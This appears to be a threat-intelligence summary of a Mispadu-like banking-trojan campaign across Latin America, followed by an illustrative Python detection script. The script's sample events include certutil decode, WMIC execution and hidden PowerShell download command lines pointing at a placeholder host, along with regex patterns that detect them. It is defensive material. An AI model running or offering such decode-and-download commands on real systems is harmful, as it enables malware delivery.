An Extensive Infection Campaign Across LATAM
Category: Threat Actor Activity | Industries: Education, Entertainment, Financial Services, Government, Media, Retail, Technology | Level: Tactical | Source: Metabase
The Metabase Q Threat Intelligence Team analyzed 20 different spam campaigns targeting entities in Chile, Mexico, Peru, and Portugal, identifying a large-scale credential-stealing campaign that likely distributes malware resembling the Mispadu banking trojan. The campaign, active since August 2022, has targeted organizations associated with internet banking, education, government services, social networking, gaming, retail, and technology. "In several cases, the cyber criminals created fake webpages for the victim, such as online banking windows. For the initial infection, the attackers tried to lure the victims into opening different types of fake bills via HTML pages or PDF password-protected files," as shared by the Metabase Q Team. The campaign is revealed to have compromised "a total of 90,518 credentials coming from 17,595 unique websites across all industry sectors."
Compromising legitimate websites and using them as Command & Control servers is one of the actors' primary strategies for propagating malware. To execute this campaign, the threat actors scout for vulnerable Content Management System (CMS) versions, such as WordPress, and exploit them to take control of websites. With this control, they spread malware in a tailored fashion: excluding specific countries, delivering distinct malware types according to the infected country, and even installing a specific malicious RAT (Remote Administration Tool) depending on the device. The malware does not install if the host is a mobile device. A multi-stage infection chain highlights the campaign’s potency: "the cyber criminals hide the malware inside of fake certificates so it’s harder to detect. They then misuse a legitimate windows program 'certutil' to decode and execute the banking trojan." Following the decoding of the initial weaponized payload, WMIC is used to execute Mispadu, with persistence established through a shortcut/LNK file and a PowerShell-based remote access trojan (RAT).
- Decoded Payload Establishes Persistence & Downloads/Runs Payload
Anvilogic Use Cases:
- Certutil De-Obfuscate/Decode Files
- WinRM Tools
- Invoke-WebRequest Command
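As an added illustration, not taken from the Metabase Q report or from Anvilogic's own detection content, the Python below runs simple process-creation rules for the certutil decode, WMIC execution and Invoke-WebRequest steps described above, and correlates the certutil-decode-then-WMIC chain per host. The events, host names, timestamps, file names and the time window are all constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (Sysmon Event ID 1 / EDR style);
# none of these values come from the report.
SAMPLE_EVENTS = [
    {"host": "ws01", "ts": 100, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": "certutil -decode C:\\Users\\Public\\factura.crt C:\\Users\\Public\\factura.exe"},
    {"host": "ws01", "ts": 130, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": 'wmic process call create "C:\\Users\\Public\\factura.exe"'},
    {"host": "ws01", "ts": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -nop -w hidden -c "Invoke-WebRequest http://example.invalid/x -OutFile a.ps1"'},
    {"host": "ws02", "ts": 300, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": "certutil -verify C:\\temp\\legit.cer"},   # benign certutil use, should not fire
]

# Rule name -> (image-name regex, command-line regex). Both must match.
# The -decodehex/-urlcache switches and the "iwr" alias are assumed extras.
RULES = {
    "Certutil De-Obfuscate/Decode Files": (r"certutil(\.exe)?$", r"\s-(decode|decodehex|urlcache)\b"),
    "WMIC Process Call Create":           (r"wmic(\.exe)?$",     r"process\s+call\s+create"),
    "Invoke-WebRequest Command":          (r"powershell(\.exe)?$", r"(invoke-webrequest|\biwr\b)"),
}

def match_rules(event):
    """Names of every rule whose image and command-line patterns both match."""
    return [name for name, (img_re, cmd_re) in RULES.items()
            if re.search(img_re, event["image"], re.I) and re.search(cmd_re, event["cmd"], re.I)]

def detect(events):
    """Per-event detections as (host, rule_name) pairs, in event order."""
    return [(e["host"], r) for e in events for r in match_rules(e)]

def chain_hosts(events, window=300):
    """Hosts where a certutil decode is followed within `window` seconds by a
    WMIC process creation: the decode-then-execute chain from the report."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_host[e["host"]].append(e)
    flagged = set()
    for host, evs in by_host.items():
        decode_ts = [e["ts"] for e in evs if "Certutil De-Obfuscate/Decode Files" in match_rules(e)]
        for e in evs:
            if "WMIC Process Call Create" in match_rules(e) and \
               any(0 <= e["ts"] - t <= window for t in decode_ts):
                flagged.add(host)
    return flagged
```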